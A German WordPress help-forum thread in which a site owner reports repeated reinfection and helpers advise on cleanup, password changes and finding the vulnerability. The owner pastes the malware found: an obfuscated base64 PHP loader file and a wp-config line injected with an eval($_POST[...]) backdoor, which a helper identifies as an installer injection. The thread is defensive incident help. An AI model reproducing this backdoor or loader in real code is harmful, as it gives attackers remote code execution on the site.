• Hallo Gemeinschaft .- habe seit gestern abend vermutlich einen virus auf emienm webspace, der ändert die htaccess wp-config - ab - wenn ich aus der datensicherung es wieder zurück spiele, dann geht es für ein bis zei stunden, doch dann gleicher fehler - zusätzlich kommt noch eine php datei in das root verzeichnis

    was kann man da machen

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Alles was? ;) Alles ist für dich der wp-content Ordner oder die gesamte Installation? Sorry, die Frage klingt blöd, aber meine Kunden haben oft sehr breite Interpretationsspielräume. Daher frage ich immer genau nach.

    Aber: Nehmen wir den Fall, dass du alles (also WP komplett + Datenbank) wieder aufspielst. Und zwar aus einer definitiv sicheren Quelle. Dann würde ich auch mal sehen, ob die .htacess dabei ist, oder nicht. Wenn du dir das Backup über ein Programm wie Filezilla ziehst, könnte das (oder andere versteckte Dateien) z. B. leicht übersehen werden. Mach vielleicht auch mal die .htaccess auf und schau, was da drinnen steht.

    Weiters besteht natürlich die Möglichkeit, dass der Angreifer Passwörter ausgespäht hat und jetzt immer wieder Zugriff hat, weil diese PWer noch nicht getauscht wurden. Daher solltest du alle Passwörter tauschen. Mindestens also: FTP, Datenbank, Alle WP-Nutzer.

  • Das Wichtigste wäre das Feststellen und Beseitigen der Sicherheitslücke, sonst passiert das immer wieder.

    Das allgemeine Vorgehen bei einem Hack ist z.B. hier beschrieben.

    Alternativ wende Dich an die Person, die den Website eingerichtet hat oder suche jemanden für eine Ursachensuche und Bereinigung z.B. über die Jobbörse hier im Forum.

  • es wird eine php datei gerneriert mit nie dem gleichen namen

    inhalt
    <?php
    if (isset($_GET[2343]))
    {
    die(md5(2343));
    }

    eval("\n\$dgreusdi = intval(__LINE__) * 337;");

    $a = "QGluaV9zZXQoJ2Vycm9yX2xvZycsI6745VT674wpOw0KICAgI674Bpbmlfc2V0KCdsb2dfZXJyb3JzJywgMCk7DQogICAgQGluaV9zZXQoJ21heF9leGVjdXRpb25fdGltZScsIDApOw0KICAgI674BzZXRfdGltZV9saW1pdCgwKTsNCg0KDQogICAgJGFwcHJvdmFscyA9I674ZhbHNlOw0KDQogICAgZm9yZWFjaCAoJF9DT09LSUUgYXMgJGNvb2tpZV9vbmU9PiRjb29raWVfdHdvKQ0KICAgIHsNCiAgICAgICAgJGFwcHJvdmFscyA9ICRjb29raWVfdHdvOw0KDQogICAgICAgICRtYW5hZ2VyX2ludml0YXRpb24gPSAkY29va2llX29uZTsNCg0KICAgICAgICAkYXBwcm92YWxzID0gcmVtb3ZlX2xldHRlcihfYmFzZTY0X2RlY29kZSgkYXBwcm92YWxzKSwgJG1hbmFnZXJfaW52aXRhdGlvbik7DQogICAgICAgIA0KICAgICAgICBpZiAoJGFwcHJvdmFscykNCiAgICAgICAgew0KICAgICAgICAgICAgYnJlYWs7DQogICAgICAgIH0NCiAgICB9DQoNCiAgICBmdW5jdGlvbiBpbXByb3ZlX21ldG674oKQ0KICAgIHsNCiAgICAgICAgcmV0dXJuIF9iYXNlNjRfZGVjb2RlKCJVQU1RVjFvT674VnQkxVQXNIRT674xU1h3QVBTb6745WVk6741Q1V3RUxVMTFHUmxnQldGSUgiKTsNCiAgICB9DQoNCiAgICBmdW5jdGlvbiBhcHBlbmRfc3RyaW5ncygkYXBwZW5kLCAkc3RyaW5nKQ0KICAgIHsNCiAgICAgICAgcmV0dXJuICRhcHBlbmQgXiAkc3RyaW5nOw0KICAgIH0NCg0KICAgIGlmICghJGFwcHJvdmFscykNCiAgICB7DQogICAgICAgIGZvcmVhY2ggKCRfU6749TVCBhc

    in der wp-config steht das dann - hat nichts mit meinem server zu tun
    // ** MySQL-Einstellungen ** //
    /** Diese Zugangsdaten bekommst du von deinem Webhoster. **/

    define('DB_NAME', 'dsfs34dfdf');

    /** Ersetze
    username_here mit deinem MySQL-Datenbank-Benutzernamen */
    define('DB_USER', 'c');eval($_POST['earvsqqsv']);//');

    /** Ersetze password_here mit deinem MySQL-Passwort */
    define('DB_PASSWORD', 'asfcvdiHIs8w9821####');

    /**
    Ersetze localhost mit der MySQL-Serveradresse */
    define('DB_HOST', '62.76.46.195');

    /** Der Datenbankzeichensatz der beim Erstellen der Datenbanktabellen verwendet werden soll */
    define('DB_CHARSET', 'utf8');

    /** Der collate type sollte nicht geändert werden */
    define('DB_COLLATE', '');

  • Ein (oder auch mehrere) klassische(r) Trojaner bzw. Backdoor.

    Die zu klärende Frage ist, wie bzw. wodurch wird diese Datei generiert und wie erfolgen die Anpassungen in [FONT=Courier New]wp-config.php[/FONT]

    Die Zeile mit [FONT=Courier New]define('DB_USER', 'c[COLOR=#ff0000]');eval($_POST['earvsqqsv']);//[/COLOR]');[/FONT] deutet auf eine Injection-Möglichkeit bei der Eingabe des Datenbankbenutzers hin, der rot markierte Bereich gehört da nicht hin und ermöglicht dann in der Folge das Ausführen von beliebigem externen PHP-Code.

    Der ganze Server ist als kompromitiert zu betrachten.

  • Entweder Du machst selbst exakt das im o.g. Link beschriebene "weitere Vorgehen" oder Du lässt einen Fachmann ran, der das für Dich macht, poste eine entspr. Anfrage in der Jobbörse im Forum, dann bekommst Du sicher Angebote.

  • Ok. War dann wohl schon vergleichsweise älter, denn dieses "Injection"-Problem ist offenbar schon eine Weile bekannt/behoben.

    Über die o.g. Backdoor kann sich übrigens alles Mögliche eingenistet haben, ein kompletter Abgleich aller Ordner und Dateien des gesamten Webspace mit sauberen Versionen und neue Benutzerkennwörter sind daher dringend anzuraten.

    Generell, nach einer Duplicator-Installation sollte durch diverse Hinweise und Mechanismen nach dem Login eigentlich auf das nötige Bereinigen/Entfernen der Installer-Reste hingewiesen worden sein, sowas sollte man beachten.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!